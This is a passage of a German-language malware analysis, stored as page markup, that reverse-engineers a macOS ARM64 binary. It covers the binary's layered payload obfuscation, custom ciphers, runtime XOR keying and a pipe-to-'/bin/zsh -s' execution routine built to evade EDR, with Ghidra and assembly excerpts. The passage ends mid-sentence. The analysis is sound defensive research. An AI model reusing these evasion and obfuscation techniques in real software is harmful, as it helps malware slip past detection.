",[1524,2447,2448],{},"ASR"," (Arithmetic Shift Right) ist entscheidend: Er bewahrt das Vorzeichenbit. 
Wenn das Zwischenergebnis von ",[1524,2451,2452],{},"(b×3) XOR a"," negativ ist, was häufig vorkommt, würde ein logischer Shift ein völlig anderes Ergebnis liefern. Das ist beabsichtigt: Wer die Formel in einer höheren Programmiersprache mit ",[1524,2455,2456],{},">>"," nachimplementiert, erhält stillschweigend falsche Ausgaben, sofern die vorzeichenbehaftete Arithmetik nicht explizit berücksichtigt wird.",[806,2459,2460,2461,2463,2464,2466,2467,2470],{},"Die 56-Zeichen-Variante ",[1524,2462,2214],{}," ist strukturell identisch, arbeitet auf ",[1524,2465,2221],{}," mit einem Loop-Limit von ",[1524,2468,2469],{},"0x38",". Beide Funktionen wurden während dieser Analyse live in Ghidra bestätigt.",[1508,2472],{},[1671,2474,2476],{"id":2475},"layer-2-hex-string-kodierung","Layer 2: Hex-String-Kodierung",[806,2478,1677],{},[806,2480,2481,2482,2485,2486,2203,2489,2492,2493,2496],{},"Die von Layer 1 erzeugten Rohbytes sind selbst ASCII-Hex-Zeichen, keine Binärdaten. Die Ausgabe eines Layer-1-Triplet-Decodes ist ein String aus Hex-Paaren: ",[1524,2483,2484],{},"32694e5462...",". 
Das wird durch die Decoder-Funktion ",[1524,2487,2488],{},"FUN_100000dc0",[1524,2490,2491],{},"0x100000dc0"," bestätigt, die einen Hex-Decode über eine Lookup-Tabelle bei ",[1524,2494,2495],{},"DAT_1007bb591"," implementiert.",[806,2498,2499,2500,2356,2503,2289,2506,2356,2509,2289,2512,2356,2515,2518],{},"Der Ghidra-Decompile zeigt eine Switch-Anweisung, die jedes Hex-Zeichen (",[1524,2501,2502],{},"0x30",[1524,2504,2505],{},"0x39",[1524,2507,2508],{},"0x41",[1524,2510,2511],{},"0x46",[1524,2513,2514],{},"0x61",[1524,2516,2517],{},"0x66",") auf seinen Nibble-Wert abbildet und Ausgabebytes jeweils zwei Zeichen auf einmal zusammensetzt:",[1541,2520,2521],{"style":1543},[2009,2522,2523,2526,2529,2532,2533,2536,2537,2539,2540,2025,2543,2545,2546,2549,2550,1905,2553,2025,2555,2558,2559,2388,2562,2564,2565,1905,2568,2025,2570,2558,2573,2388,2576,2564,2578,1905,2581,1905,2584,2025,2586,2545,2588,2025,2590,2558,2592,2388,2595,2597,2598,1905,2601,2025,2603,2545,2606,2025,2608,2558,2611,2388,2614,2597,2616,1905,2619,2025,2621,2545,2624,2025,2626,2629,2630,2388,2633,2597,2635,1905,2638,2025,2640,2545,2643,2025,2645,2648,2649,2388,2652,2597,2654,1905,2657,2025,2659,2545,2662,2025,2664,2558,2667,2388,2670,2597,2672,1905,2675,2025,2677,2545,2679,2025,2681,2558,2683,2388,2686,2597,2688,2691,2692,2695,2696,2536,2699,2701,2702,2704,2705,2708],{},[1588,2524,2525],{"style":2013},"// FUN_100000dc0 @ 0x100000dc0",[1588,2527,2528],{"style":2013},"// Hex decoder, processes input two characters per output byte",[1588,2530,2531],{"style":2023},"switch","(*(",[1588,2534,2535],{"style":2023},"undefined1"," *)((",[1588,2538,2241],{"style":2023},")plVar2 + lVar7)) {\n  ",[1588,2541,2542],{"style":2023},"case",[1588,2544,2502],{"style":2049},": ",[1588,2547,2548],{"style":2023},"break",";                  ",[1588,2551,2552],{"style":2013},"// '0' → 0x00",[1588,2554,2542],{"style":2023},[1588,2556,2557],{"style":2049},"0x31",": bVar9 = 
",[1588,2560,2561],{"style":2049},"0x10",[1588,2563,2548],{"style":2023},";   ",[1588,2566,2567],{"style":2013},"// '1' → 0x10",[1588,2569,2542],{"style":2023},[1588,2571,2572],{"style":2049},"0x32",[1588,2574,2575],{"style":2049},"0x20",[1588,2577,2548],{"style":2023},[1588,2579,2580],{"style":2013},"// '2' → 0x20",[1588,2582,2583],{"style":2013},"// ... '3' through '9' ...",[1588,2585,2542],{"style":2023},[1588,2587,2508],{"style":2049},[1588,2589,2542],{"style":2023},[1588,2591,2514],{"style":2049},[1588,2593,2594],{"style":2049},"0xa0",[1588,2596,2548],{"style":2023},";  ",[1588,2599,2600],{"style":2013},"// 'A'/'a' → 0xa0",[1588,2602,2542],{"style":2023},[1588,2604,2605],{"style":2049},"0x42",[1588,2607,2542],{"style":2023},[1588,2609,2610],{"style":2049},"0x62",[1588,2612,2613],{"style":2049},"0xb0",[1588,2615,2548],{"style":2023},[1588,2617,2618],{"style":2013},"// 'B'/'b' → 0xb0",[1588,2620,2542],{"style":2023},[1588,2622,2623],{"style":2049},"0x43",[1588,2625,2542],{"style":2023},[1588,2627,2628],{"style":2049},"99",":   bVar9 = ",[1588,2631,2632],{"style":2049},"0xc0",[1588,2634,2548],{"style":2023},[1588,2636,2637],{"style":2013},"// 'C'/'c' → 0xc0",[1588,2639,2542],{"style":2023},[1588,2641,2642],{"style":2049},"0x44",[1588,2644,2542],{"style":2023},[1588,2646,2647],{"style":2049},"100",":  bVar9 = ",[1588,2650,2651],{"style":2049},"0xd0",[1588,2653,2548],{"style":2023},[1588,2655,2656],{"style":2013},"// 'D'/'d' → 0xd0",[1588,2658,2542],{"style":2023},[1588,2660,2661],{"style":2049},"0x45",[1588,2663,2542],{"style":2023},[1588,2665,2666],{"style":2049},"0x65",[1588,2668,2669],{"style":2049},"0xe0",[1588,2671,2548],{"style":2023},[1588,2673,2674],{"style":2013},"// 'E'/'e' → 0xe0",[1588,2676,2542],{"style":2023},[1588,2678,2511],{"style":2049},[1588,2680,2542],{"style":2023},[1588,2682,2517],{"style":2049},[1588,2684,2685],{"style":2049},"0xf0",[1588,2687,2548],{"style":2023},[1588,2689,2690],{"style":2013},"// 'F'/'f' → 
0xf0","\n}\n",[1588,2693,2694],{"style":2013},"// Second nibble from lookup table at DAT_1007bb591","\n*(",[1588,2697,2698],{"style":2023},"byte",[1588,2700,2241],{"style":2023},")pppppppuVar3 + uVar8) =\n    (&DAT_1007bb591)[(",[1588,2703,2066],{"style":2023},")uVar4 & ",[1588,2706,2707],{"style":2049},"0xff","] | bVar9;\n",[806,2710,2711],{},"Der ARM64-Assembly treibt dies mit einer sekundären Computed-Branch-Tabelle an und implementiert so faktisch eine 55-Einträge-Sprungtabelle für den Switch:",[1541,2713,2714],{"style":1543},[1545,2715,2718],{"className":2716,"code":2717,"language":916},[1548],"100000e5c:  adr x17,0x100000e6c      ; base of case-dispatch table\n100000e60:  ldrb w0,[x12, x16, LSL ] ; load offset for this hex char\n100000e64:  add x17,x17,x0, LSL #0x2 ; compute dispatch address\n100000e68:  br x17                   ; jump — second computed branch in 24 bytes\n",[1524,2719,2717],{"__ignoreMap":863},[806,2721,2722],{},"Zwei berechnete Branches in einem 24-Byte-Fenster. 
Statische Analysetools kommen mit diesem Muster nicht zurecht, weil beide Branch-Ziele zur Analysezeit unbekannt sind.",[806,2724,2725],{},"Ein 137.208 Zeichen langer Hex-String ergibt nach der Dekodierung 68.604 Byte, die dann in Layer 3 eingespeist werden.",[1508,2727],{},[1671,2729,2731],{"id":2730},"layer-3-benutzerdefiniertes-16-symbol-nibble-alphabet","Layer 3: Benutzerdefiniertes 16-Symbol-Nibble-Alphabet",[806,2733,1677],{},[806,2735,2736],{},"Die 68.604 Ausgabebytes aus Layer 2 verwenden nur 16 eindeutige Bytewerte aus zwei nicht zusammenhängenden ASCII-Bereichen:",[2738,2739,2740,2790],"ul",{},[2741,2742,2743,2746,2747,2289,2750,2289,2753,2289,2756,2289,2759,2289,2762,2289,2765,2289,2768,2289,2770,2289,2773,2289,2776,2289,2779,2289,2782,2289,2784,2289,2787],"li",{},[1524,2744,2745],{},"0x20-0x2F",": Leerzeichen, ",[1524,2748,2749],{},"!",[1524,2751,2752],{},"\"",[1524,2754,2755],{},"#",[1524,2757,2758],{},"$",[1524,2760,2761],{},"%",[1524,2763,2764],{},"&",[1524,2766,2767],{},"'",[1524,2769,2030],{},[1524,2771,2772],{},")",[1524,2774,2775],{},"*",[1524,2777,2778],{},"+",[1524,2780,2781],{},",",[1524,2783,2356],{},[1524,2785,2786],{},".",[1524,2788,2789],{},"/",[2741,2791,2792,2545,2795,2289,2798,2289,2801,2289,2804,2289,2807,2289,2810,2289,2813,2816],{},[1524,2793,2794],{},"0x78-0x7F",[1524,2796,2797],{},"x",[1524,2799,2800],{},"y",[1524,2802,2803],{},"z",[1524,2805,2806],{},"{",[1524,2808,2809],{},"|",[1524,2811,2812],{},"}",[1524,2814,2815],{},"~",", DEL",[806,2818,2819],{},"Das ist eine bewusste Designentscheidung. In einem Hex-Editor sehen diese Bytes aus wie Leerzeichen, Satzzeichen und ASCII-Randzeichen; sie verschwimmen im Rauschen dessen, was wie Metadaten oder Padding wirkt. 
Ein Analyst, der einen Hex-Dump überfliegt, wird diese Bytebereiche nicht als verdächtig markieren, und Standard-Entropieanalysen schlagen nicht an: Ein 16-Symbol-Alphabet liefert höchstens 4 Bit Entropie pro Byte, der Blob wirkt also weder gepackt noch verschlüsselt, obwohl er einen vollständigen Payload trägt.",[806,2821,2822,2823,2826,2827,2830,2831,2834,2835,2838],{},"Jedes Byte aus diesem Alphabet kodiert ein Nibble des eigentlichen Payloads. Die Alphabet-zu-Nibble-Zuordnung wird von der Encode-/Decode-Funktion ",[1524,2824,2825],{},"FUN_100000d60"," angewendet, die wir bei ",[1524,2828,2829],{},"0x100000d60"," bestätigten. Sie verkettet zwei Sub-Funktionen: ",[1524,2832,2833],{},"FUN_100000b50"," erstellt eine indizierte Map der Zeichen des Eingabe-Strings, und ",[1524,2836,2837],{},"FUN_100000c34"," durchläuft diese Map, verbraucht 4 Bit (ein Nibble) pro Schritt und akkumuliert Ausgabebytes 8 Bit auf einmal, was die Halbierung von 68.604 auf 34.302 Byte erklärt:",[1541,2840,2841],{"style":1543},[2009,2842,2843,2846,2847,2849,2850,2852,2853,2855,2856,2859,2860,1905,2863,2865,2866,2868,2869,1909,2872,2874,2875,2878,2879,2881,2882,1909,2885,2887,2888,2891,2892,2895,2896,2898,2899,2902,2903,2905,2906,2536,2909,2911,2912,2914,2915,2917],{},[1588,2844,2845],{"style":2013},"// FUN_100000c34 @ 0x100000c34, nibble accumulator","\niVar5 = ",[1588,2848,2292],{"style":2049},";\n",[1588,2851,2311],{"style":2023}," {\n  local_52 = *(",[1588,2854,2535],{"style":2023}," *)puVar4;\n  lVar3 = ",[1588,2857,2858],{"style":2028},"FUN_1000a078c","(param_3, &local_52);  ",[1588,2861,2862],{"style":2013},"// look up nibble value",[1588,2864,2318],{"style":2023}," (lVar3 == ",[1588,2867,2292],{"style":2049},") {\n    ",[1588,2870,2871],{"style":2013},"// character not in alphabet, treat as raw",[1588,2873,2858],{"style":2028},"(param_3, &local_51);\n  } ",[1588,2876,2877],{"style":2023},"else"," {\n    iVar5 = iVar5 + ",[1588,2880,2070],{"style":2049},";           ",[1588,2883,2884],{"style":2013},"// accumulate 4 bits",[1588,2886,2395],{"style":2023}," (",[1588,2889,2890],{"style":2049},"7"," \u003C iVar5) {\n      
std::string::",[1588,2893,2894],{"style":2028},"push_back","((",[1588,2897,2326],{"style":2023},")param_1);  ",[1588,2900,2901],{"style":2013},"// emit byte when 8+ bits ready","\n      iVar5 = iVar5 + -",[1588,2904,2307],{"style":2049},";\n    }\n  }\n  puVar4 = (",[1588,2907,2908],{"style":2023},"undefined8",[1588,2910,2241],{"style":2023},")puVar4 + ",[1588,2913,2322],{"style":2049},");\n} ",[1588,2916,2395],{"style":2023}," (puVar4 != puVar1);\n",[806,2919,2920],{},"Die 34.302 Byte, die aus diesem Durchlauf hervorgehen, sind zu 99,7% druckbares ASCII. Auf den ersten flüchtigen Blick sieht der Payload in dieser Stufe aus wie ein großes Shell-Skript oder ein Konfigurations-Blob.",[1508,2922],{},[1671,2924,2926],{"id":2925},"layer-4-compile-time-string-obfuskierung","Layer 4: Compile-Time-String-Obfuskierung",[806,2928,1677],{},[806,2930,2931],{},"Intern genutzte Strings werden zur Kompilierzeit mit demselben Triplet-Schema wie Layer 1 obfuskiert und zur Laufzeit unmittelbar vor ihrer Verwendung rekonstruiert. Im Speicher halten sie sich nie länger als nötig auf; der Buffer wird nach dem Verbrauch sofort freigegeben. In den statischen Datensektionen der Binary ist zu keinem Zeitpunkt ein dekodierter String sichtbar.",[806,2933,2934,2935,2938],{},"Die String-Hash-Funktion ",[1524,2936,2937],{},"FUN_100000730"," liefert eine sekundäre Obfuskierungsschicht für String-Vergleiche. 
Statt Strings direkt zu vergleichen, was Klartext im Speicher hinterlassen würde, berechnet und vergleicht die Binary Integer-Hashes:",[1541,2940,2941],{"style":1543},[2009,2942,2943,2946,2949,2025,2951,2030,2953,2242,2955,2957,2958,2961,2962,1905,2965,1905,2968,2971,2972,2974,2975,2977,2978,2980,2981,2597,2984,2987,2988,2990,2991,2993],{},[1588,2944,2945],{"style":2013},"// FUN_100000730 @ 0x100000730",[1588,2947,2948],{"style":2013},"// FNV-style string hash, avoids plaintext string comparisons",[1588,2950,2036],{"style":2023},[1588,2952,2937],{"style":2028},[1588,2954,2326],{"style":2023},[1588,2956,2036],{"style":2023}," iVar4 = ",[1588,2959,2960],{"style":2049},"0x19a8",";    ",[1588,2963,2964],{"style":2013},"// FNV offset basis (modified)",[1588,2966,2967],{"style":2013},"// ...",[1588,2969,2970],{"style":2023},"for"," (; uVar3 != ",[1588,2973,2292],{"style":2049},"; uVar3 = uVar3 - ",[1588,2976,2322],{"style":2049},") {\n    iVar4 = (",[1588,2979,2036],{"style":2023},")*pcVar1 + iVar4 * -",[1588,2982,2983],{"style":2049},"0x7fb91be3",[1588,2985,2986],{"style":2013},"// FNV-1a style multiply","\n    pcVar1 = pcVar1 + ",[1588,2989,2322],{"style":2049},";\n  }\n  ",[1588,2992,2078],{"style":2023}," iVar4;\n}\n",[806,2995,2996],{},"Der ARM64-Assembly ersetzt die Multiplikation durch ein Fused Multiply-Add:",[1541,2998,2999],{"style":1543},[1545,3000,3003],{"className":3001,"code":3002,"language":916},[1548],"100000744:  mov w0,#0x19a8            ; FNV basis\n100000750:  mov w10,#0xe41d\n100000754:  movk w10,#0x8046, LSL #16 ; constant = 0x8046e41d = -0x7fb91be3\n100000758:  ldrsb w11,[x8], #0x1      ; load char, post-increment\n10000075c:  madd w0,w0,w10,w11        ; w0 = w0 * 0x8046e41d + char\n100000760:  subs x9,x9,#0x1\n100000764:  b.ne 0x100000758\n",[1524,3004,3002],{"__ignoreMap":863},[806,3006,3007],{},"Das bedeutet, dass selbst ein Vergleich zweier Strings innerhalb der Binary keinen Branch erzeugt, den ein Debugger sauber auf String-Ebene abfangen 
kann, sondern nur auf Hash-Ebene.",[1508,3009],{},[1671,3011,3013],{"id":3012},"layer-5-duale-custom-stream-cipher-instanzen","Layer 5: Duale Custom-Stream-Cipher-Instanzen",[806,3015,1677],{},[806,3017,3018,3019,3022],{},"An dieser Stelle wird die Obfuskierungsarchitektur ungewöhnlich. In der Binary laufen nicht eine, sondern ",[1736,3020,3021],{},"zwei separate Cipher-Instanzen",", jede mit einer anderen hartcodierten Lookup-Tabelle und einem anderen Startzähler. Beide verwenden dieselbe Algorithmusstruktur, erzeugen aber unterschiedliche Ausgabe-Alphabete für verschiedene Teile der Payload-Pipeline.",[806,3024,3025,2289,3028,2203,3031,3034],{},[1736,3026,3027],{},"Instanz A",[1524,3029,3030],{},"FUN_10007ab34",[1524,3032,3033],{},"0x10007ab34",":",[1541,3036,3037],{"style":1543},[2009,3038,3039,3042,3043,2849,3046,3048,3049,2536,3051,3053,3054,3056,3057,2536,3059,3061,3062,3064,3065,2536,3067,3069,3070,3072,3073,3076,3077,3079,3080,3082],{},[1588,3040,3041],{"style":2013},"// Instance A, start counter 0x4c, table @ 0x100496f8b","\nuVar6 = ",[1588,3044,3045],{"style":2049},"0x4c",[1588,3047,2311],{"style":2023}," {\n  bVar2 = *(",[1588,3050,2698],{"style":2023},[1588,3052,2241],{"style":2023},")local_e0 +\n          ((",[1588,3055,2066],{"style":2023},")(*(",[1588,3058,2698],{"style":2023},[1588,3060,2241],{"style":2023},")local_c8 + uVar5) ^ uVar6) & ",[1588,3063,2707],{"style":2049},"));\n  *(",[1588,3066,2698],{"style":2023},[1588,3068,2241],{"style":2023},")plVar1 + uVar5) = bVar2;\n  uVar6 = (",[1588,3071,2036],{"style":2023},")uVar5 + (uVar6 ^ bVar2);  ",[1588,3074,3075],{"style":2013},"// counter: i + (counter XOR output)","\n  uVar5 = uVar5 + ",[1588,3078,2322],{"style":2049},";\n} ",[1588,3081,2395],{"style":2023}," (uVar7 != uVar5);\n",[806,3084,3085,2289,3088,2203,3091,3034],{},[1736,3086,3087],{},"Instanz 
B",[1524,3089,3090],{},"FUN_10007a7e0",[1524,3092,3093],{},"0x10007a7e0",[1541,3095,3096],{"style":1543},[2009,3097,3098,3042,3101,2849,3104,3048,3106,2536,3108,3110,3111,3056,3113,2536,3115,3117,3118,3064,3120,2536,3122,3069,3124,3072,3126,3076,3129,3079,3131,3082],{},[1588,3099,3100],{"style":2013},"// Instance B, start counter 0x9f, different table @ 0x100496e0a region",[1588,3102,3103],{"style":2049},"0x9f",[1588,3105,2311],{"style":2023},[1588,3107,2698],{"style":2023},[1588,3109,2241],{"style":2023},")local_c0 +\n          ((",[1588,3112,2066],{"style":2023},[1588,3114,2698],{"style":2023},[1588,3116,2241],{"style":2023},")local_a8 + uVar5) ^ uVar6) & ",[1588,3119,2707],{"style":2049},[1588,3121,2698],{"style":2023},[1588,3123,2241],{"style":2023},[1588,3125,2036],{"style":2023},[1588,3127,3128],{"style":2013},"// identical counter update formula",[1588,3130,2322],{"style":2049},[1588,3132,2395],{"style":2023},[806,3134,3135,3136,3138,3139,3141],{},"Der Algorithmus ist strukturell identisch, aber der Startzähler unterscheidet sich (",[1524,3137,3045],{}," vs. ",[1524,3140,3103],{},") und die Lookup-Tabellen liegen an verschiedenen Speicheradressen. Instanz A wird aus Zustand 11 der Zustandsmaschine aufgerufen, um das Kodierungsalphabet für den ersten Payload-Pfad zu erzeugen. Instanz B wird aus Zustand 6 aufgerufen, um das Alphabet für den Decode des großen Shell-Skript-Payloads zu erzeugen.",[806,3143,3144,3145,3148,3149,3152,3153,3156],{},"Präzise formuliert: Es handelt sich um eine ",[1736,3146,3147],{},"Substitutionschiffre mit zählerabhängigem Index",". Jedes Ausgabebyte ist ein Tabellen-Lookup, bei dem der Index ",[1524,3150,3151],{},"(input_byte XOR counter) & 0xFF"," ist. Der Zähler aktualisiert sich nach jedem Byte als ",[1524,3154,3155],{},"counter = (i + (counter XOR output)) & 0xFF",", was bedeutet, dass jedes Ausgabebyte die Bestimmung des nächsten Lookup-Index beeinflusst. 
Das erzeugt eine Abhängigkeitskette über die gesamte Ausgabesequenz: Byte N lässt sich nicht entschlüsseln, ohne die Bytes 0 bis N-1 korrekt entschlüsselt zu haben. Partielle Entschlüsselung oder Fehleranalyse werden dadurch erheblich schwieriger.",[806,3158,3159],{},"Keine der Instanzen ist Standard-RC4. Es gibt keine S-Box-Initialisierungsphase, keine S-Box-Swap-Operation. Die Lookup-Tabellen sind statische, zur Kompilierzeit eingebettete Konstanten.",[1508,3161],{},[1671,3163,3165],{"id":3164},"layer-6-runtime-xor-mit-exit-code-abhängigem-schlüssel","Layer 6: Runtime-XOR mit Exit-Code-abhängigem Schlüssel",[806,3167,1677],{},[806,3169,3170,3171,3174],{},"Die letzte und analytisch anspruchsvollste Schicht wendet eine In-Place-XOR-Transformation auf den Stage-2-Payload an. Der XOR-Schlüssel ist nicht hartcodiert, sondern wird zur Laufzeit aus dem Exit-Code der ",[1736,3172,3173],{},"ersten Shell-Payload-Ausführung"," abgeleitet, und ist damit durch statische Analyse prinzipiell nicht bestimmbar. 
Die Binary muss tatsächlich ausgeführt werden und das erste Shell-Skript bis zum Ende laufen, bevor der Schlüssel überhaupt existiert.",[806,3176,3177],{},"Die Schlüsselableitungssequenz im ARM64-State-Machine-Dispatcher:",[1541,3179,3180],{"style":1543},[1545,3181,3184],{"className":3182,"code":3183,"language":916},[1548],"; After shell_exec_via_pipe #1 returns, exit code is in w0\n10009f838:  ubfx w8,w0,#0x8,#0x8     ; extract bits [15:8] of exit status\n10009f83c:  mov w9,#0x7f0             ; multiplier constant\n10009f840:  madd w8,w8,w9,w26         ; key = (exit_byte × 0x7f0) + base_counter\n10009f844:  and w24,w8,#0xffff        ; mask to 16-bit key → stored in w24\n",[1524,3185,3183],{"__ignoreMap":863},[806,3187,3188],{},"Der XOR-Loop, der den Stage-2-Payload verarbeitet:",[1541,3190,3191],{"style":1543},[1545,3192,3195],{"className":3193,"code":3194,"language":916},[1548],"; In-place XOR, every byte of the payload is XORed with w24\n10009fc34:  ldrb w10,[x8, x9, LSL ]  ; load payload byte\n10009fc48:  eor w10,w10,w24          ; XOR with key\n10009fc4c:  strb w10,[x8, x9, LSL ]  ; write decrypted byte in place\n",[1524,3196,3194],{"__ignoreMap":863},[806,3198,3199,3200,3203,3204,3207,3208,3210],{},"Der Schlüssel ist ein 16-Bit-Wert, der aus dem Exit-Status-Byte des ersten Shell-Payloads abgeleitet, mit ",[1524,3201,3202],{},"0x7f0"," multipliziert und zum aktuellen Wert des Basiszählerregisters ",[1524,3205,3206],{},"w26"," der Zustandsmaschine addiert wird. Die Multiplikationskonstante ",[1524,3209,3202],{}," bewirkt, dass ein Einzelbit-Unterschied im Exit-Code einen völlig anderen Schlüssel erzeugt. Es gibt keine ausnutzbare Kontinuität zwischen benachbarten Schlüsselwerten.",[806,3212,3213],{},"Ohne die Binary in einer kontrollierten Umgebung auszuführen und den genauen Exit-Code des ersten Shell-Payloads aufzuzeichnen, bleibt der Stage-2-Payload für die statische Analyse dauerhaft undurchsichtig. 
Das war die schwierigste Hürde der gesamten Analyse.",[1508,3215],{},[810,3217,3219],{"id":3218},"shell-ausführung-pipes-statt-argumente-und-simd-xor","Shell-Ausführung: Pipes statt Argumente, und SIMD-XOR",[806,3221,1536],{},[806,3223,3224,3225,2203,3228,3231],{},"Die Shell-Ausführungsfunktion ",[1524,3226,3227],{},"FUN_10000091c",[1524,3229,3230],{},"0x10000091c"," ist die architektonisch interessanteste Komponente der Binary. Hier läuft alles zusammen: der dekodierte Payload, der obfuskierte Befehlsname und das explizite Anti-Forensik-Design. Jede Designentscheidung in dieser Funktion verfolgt einen spezifischen Evasionszweck.",[1671,3233,3235],{"id":3234},"schritt-1-der-befehlsname-erscheint-nie-im-klartext","Schritt 1: Der Befehlsname erscheint nie im Klartext",[806,3237,1677],{},[806,3239,3240,3243,3244,3247,3248,3251,3252,3255],{},[1524,3241,3242],{},"/bin/zsh"," existiert nirgendwo in der Binary als Klartext. Im ",[1524,3245,3246],{},"__cstring","-Abschnitt bei ",[1524,3249,3250],{},"0x1007bb5c8"," liegt der String als obfuskierte Bytes ",[1524,3253,3254],{},"\\x01LG@\\x01T]F",". 
Die Dekodierung erfolgt zur Laufzeit über eine einzelne XOR-Operation, direkt im ARM64-Assembly verifizierbar:",[1541,3257,3258],{"style":1543},[1545,3259,3262],{"className":3260,"code":3261,"language":916},[1548],"; FUN_10000091c — command name decode via SIMD XOR\n100000960:  adrp x8,0x1007bb000\n100000964:  add x8,x8,#0x5c8          ; x8 → \"\\x01LG@\\x01T]F\" in __cstring\n100000968:  ldr x8,[x8]               ; load 8 obfuscated bytes as uint64\n10000096c:  str x8,[sp, #0x20]\n100000970:  strb wzr,[sp, #0x28]      ; null terminator\n\n100000974:  ldr d0,[sp, #0x20]        ; load into SIMD register d0\n100000978:  movi v1.8B,#0x2e          ; broadcast 0x2e to all 8 lanes of v1\n10000097c:  eor v0.8B,v0.8B,v1.8B    ; XOR all 8 bytes simultaneously\n100000980:  str d0,[sp, #0x20]        ; store decoded \"/bin/zsh\"\n\n100000988:  mov w8,#0x732d            ; 0x732d = \"-s\" (little-endian)\n10000098c:  strh w8,[sp, #0x4]        ; store argument string\n",[1524,3263,3261],{"__ignoreMap":863},[806,3265,3266,3267,3270,3271,3273,3274,3277],{},"Der XOR-Schlüssel ist ",[1524,3268,3269],{},"0x2e",", der ASCII-Wert von ",[1524,3272,2786],{}," (Punkt). Die Dekodierung geschieht in einer einzigen ",[1524,3275,3276],{},"eor v0.8B, v0.8B, v1.8B","-Instruktion, einem ARM64-NEON-Vektorbefehl, der alle 8 Bytes gleichzeitig XOR-verknüpft. 
Eine SIMD-Instruktion für einen einfachen 8-Byte-Decode zu verwenden ist ungewöhnlich und hat zwei Effekte: Der Decode ist schneller als eine Byte-für-Byte-Schleife, und das erzeugte Instruktionsmuster unterscheidet sich grundlegend von den skalaren Decode-Schleifen, auf die Signatur-Matching-Tools trainiert sind.",[806,3279,3280,3281,2289,3284,2289,3287,2289,3290,3293,3294,3297],{},"Die Verifikation ist einfach: ",[1524,3282,3283],{},"0x01 XOR 0x2e = 0x2f = /",[1524,3285,3286],{},"0x4c XOR 0x2e = 0x62 = b",[1524,3288,3289],{},"0x47 XOR 0x2e = 0x69 = i",[1524,3291,3292],{},"0x40 XOR 0x2e = 0x6e = n",", was in den ersten vier Bytes ",[1524,3295,3296],{},"/bin"," ergibt.",[1671,3299,3301],{"id":3300},"schritt-2-die-pipe-architektur","Schritt 2: Die Pipe-Architektur",[806,3303,1677],{},[806,3305,3306],{},"Nach dem Dekodieren des Befehlsnamens legt die Funktion eine OS-Pipe an und forkt:",[1541,3308,3309],{"style":1543},[1545,3310,3313],{"className":3311,"code":3312,"language":916},[1548],"100000990:  bl 0x1000a0f6c    ; _fork()\n100000994:  mov x20,x0        ; save PID\n100000998:  cbz w0,0x100000b00 ; if child: jump to exec path\n",[1524,3314,3312],{"__ignoreMap":863},[806,3316,3317],{},"Im Child-Prozess:",[1541,3319,3320],{"style":1543},[1545,3321,3324],{"className":3322,"code":3323,"language":916},[1548],"; Child process path\n100000b0c:  mov w1,#0x0\n100000b10:  bl 0x1000a0f48    ; _dup2(pipe_read_fd, STDIN=0)\n; pipe read-end is now stdin, shell reads from pipe\n100000b2c:  add x0,sp,#0x20   ; argv[0] = \"/bin/zsh\"\n100000b30:  add x1,sp,#0x8    ; argv array\n100000b34:  bl 0x1000a0f60    ; _execvp(\"/bin/zsh\", [\"/bin/zsh\", \"-s\", NULL])\n",[1524,3325,3323],{"__ignoreMap":863},[806,3327,3328,3329,3332,3333,3336,3337,3339],{},"Der Child-Prozess ersetzt seinen Standard-Input durch das Lese-Ende der Pipe und startet ",[1524,3330,3331],{},"/bin/zsh -s",". Im ",[1524,3334,3335],{},"-s","-Modus liest die Shell Befehle von stdin. 
Für Process-Monitoring-Tools erscheint dieser Prozess als ",[1524,3338,3331],{}," ohne weitere Argumente, nicht zu unterscheiden von einer legitimen interaktiven Shell-Session.",[1671,3341,3343],{"id":3342},"schritt-3-chunk-writes-variabler-größe","Schritt 3: Chunk-Writes variabler Größe",[806,3345,1677],{},[806,3347,3348],{},"Der Parent-Prozess schreibt den entschlüsselten Payload in bewusst variierenden Chunk-Größen an das Schreib-Ende der Pipe:",[1541,3350,3351],{"style":1543},[1545,3352,3355],{"className":3353,"code":3354,"language":916},[1548],"; Parent: compute chunk size then write\n1000009d4:  umulh x8,x23,x24       ; high-half multiply for modulo\n1000009d8:  lsr x8,x8,#0x7\n1000009dc:  msub x8,x8,x25,x23     ; x8 = length % 0xc0\n1000009e0:  add x8,x8,#0x40        ; chunk = (length % 192) + 64\n                                    ; range: 64 to 255 bytes per write\n1000009e4:  cmp x8,x23             ; clamp to remaining length\n1000009e8:  csel x2,x8,x23,cc\n\n1000009ec:  ldr w0,[sp, #0x34]     ; pipe write fd\n1000009f0:  mov x1,x21             ; payload pointer\n1000009f4:  bl 0x1000a0fc0         ; _write(fd, buf, chunk_size)\n\n100000a04:  mov w0,#0x1\n100000a08:  bl 0x1000a0fa8         ; _usleep(1), 1µs between chunks\n100000a0c:  add x21,x21,x22        ; advance pointer\n100000a10:  sub x23,x23,x22        ; reduce remaining count\n100000a14:  cbnz x23,0x1000009d4   ; loop until done\n",[1524,3356,3354],{"__ignoreMap":863},[806,3358,3359,3360,3363,3364,3367,3368,3371,3372,3375],{},"Die Chunk-Größenformel ",[1524,3361,3362],{},"(remaining_length % 192) + 64"," erzeugt Werte zwischen 64 und 255 Byte pro Write-Aufruf, abhängig von der verbleibenden Payload-Länge. Das variable Write-Muster ist in Kernel-Event-Tracing-Tools wie ",[1524,3365,3366],{},"ktrace"," oder ",[1524,3369,3370],{},"dtrace"," sichtbar, erzeugt aber keine erkennbare Signatur aus Chunks fester Größe. 
Jede Ausführung desselben Payloads produziert eine andere Sequenz von ",[1524,3373,3374],{},"write()","-Syscall-Größen.",[806,3377,3378,3379,3381],{},"Das 1-Mikrosekunden-",[1524,3380,2085],{}," zwischen den Chunks verfolgt einen zweiten Zweck: Es gibt die CPU zwischen den Schreibvorgängen frei, hält die CPU-Auslastung flach und vermeidet eine plötzliche Spitze, die eine verhaltensbasierte EDR-Regel als anomales Burst-I/O markieren könnte.",[1671,3383,3385],{"id":3384},"schritt-4-sofortige-speicherbereinigung","Schritt 4: Sofortige Speicherbereinigung",[806,3387,1677],{},[1541,3389,3390],{"style":1543},[1545,3391,3394],{"className":3392,"code":3393,"language":916},[1548],"; After all chunks written and pipe closed:\n100000a20:  ldrb w8,[x19, #0x17]   ; check string storage type\n100000a24:  sxtb w9,w8\n100000a28:  ldp x10,x11,[x19]\n100000a30:  csel x0,x10,x19,lt     ; pointer to payload buffer\n100000a34:  csel x1,x11,x8,lt      ; length of buffer\n100000a38:  bl 0x1000a0f30         ; _bzero(payload_buf, length)\n",[1524,3395,3393],{"__ignoreMap":863},[806,3397,2445,3398,3401],{},[1524,3399,3400],{},"_bzero()","-Aufruf nullt den gesamten entschlüsselten Payload-Buffer unmittelbar nach dem letzten Schreibvorgang in die 